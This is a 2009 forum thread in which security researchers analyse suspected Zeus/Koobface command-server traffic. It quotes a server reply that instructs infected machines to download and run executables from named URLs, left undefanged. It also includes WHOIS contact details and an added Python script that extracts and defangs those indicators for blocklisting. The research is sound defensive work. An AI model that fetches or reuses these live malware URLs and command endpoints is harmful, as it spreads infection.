Author Topic: New Zeus?  (Read 3468 times)


July 08, 2009, 09:45:26 pm

cmg

 98.143.159.138:80 POST http://trisem.com/achcheck.php 
 98.143.159.138:80 POST http://trisem.com/ld/gen.php 

I can't get to ZeusTracker right now but I think this is another one.

July 08, 2009, 10:12:34 pm
Reply #1

MysteryFCM

gen.php;

Code: [Select]
#noparam
#PID=6145
START|http://upload.octopus-multimedia.be/1/6244.exe
START|http://upload.octopus-multimedia.be/1/nfr.exe
STARTONCE|http://upload.octopus-multimedia.be/1/pp.10.exe
WAIT|60
#BLACKLABEL
EXIT

upload.octopus-multimedia.be = 87.236.216.149 <> byte.besite.be

http://hosts-file.net/?s=87.236.216.149

achcheck.php;

Code: [Select]
ACH_OK

Code: [Select]
inetnum: 87.236.216.0 - 87.236.216.255
netname: BESITE-NET1-BRU-BE
mnt-domains: BESITE-MNT
descr: besite256
country: BE
admin-c: TDW7-RIPE
tech-c: TDW7-RIPE
status: ASSIGNED PA
mnt-by: BESITE-MNT
source: RIPE # Filtered

person: Tom De Wispelaere
address: Fonteinstraat 1 a bus 5
address: B- 3000 Leuven
address: BE
phone: +003216270005
fax-no: +003216270001
e-mail: tom@besite.be
nic-hdl: TDW7-RIPE
source: RIPE # Filtered

% Information related to '87.236.216.0/24AS35746'

route: 87.236.216.0/24
descr: besite256r
origin: AS35746
mnt-by: BESITE-MNT
source: RIPE # Filtered

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
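
An added example, not part of the original posts: a small Python parser for the gen.php response quoted in Reply #1 that separates the `#` marker lines from the `VERB|ARG` directives and pulls out the download URLs and hostnames for blocklisting. The line grammar is inferred from that single sample and is an assumption, and the function names are hypothetical.

```python
from urllib.parse import urlsplit

# Response body copied from the gen.php capture quoted in the thread.
SAMPLE = """\
#noparam
#PID=6145
START|http://upload.octopus-multimedia.be/1/6244.exe
START|http://upload.octopus-multimedia.be/1/nfr.exe
STARTONCE|http://upload.octopus-multimedia.be/1/pp.10.exe
WAIT|60
#BLACKLABEL
EXIT
"""

def parse_response(body):
    """Split a captured response into '#' marker lines and (VERB, ARG) directives."""
    markers, directives = [], []
    for raw in body.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            markers.append(line[1:])
        else:
            # Assumed grammar: VERB, optionally followed by '|' and one argument.
            verb, _, arg = line.partition("|")
            directives.append((verb.upper(), arg))
    return markers, directives

def extract_indicators(directives):
    """Collect URLs and unique hostnames from arguments that are http(s) URLs."""
    urls, hosts = [], []
    for _verb, arg in directives:
        parts = urlsplit(arg)
        if parts.scheme in ("http", "https") and parts.hostname:
            urls.append(arg)
            if parts.hostname not in hosts:
                hosts.append(parts.hostname)
    return urls, hosts

def defang(url):
    """Make a URL non-clickable before sharing it in a report or post."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

if __name__ == "__main__":
    markers, directives = parse_response(SAMPLE)
    urls, hosts = extract_indicators(directives)
    print("markers:", markers)
    print("\n".join(defang(u) for u in urls))
    print("\n".join(f"127.0.0.1 {h}" for h in hosts))  # hosts-file style entries
```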

July 08, 2009, 10:18:56 pm
Reply #2

MysteryFCM


July 08, 2009, 11:37:53 pm
Reply #3

philipp

The reply from gen.php says it's definitely Koobface.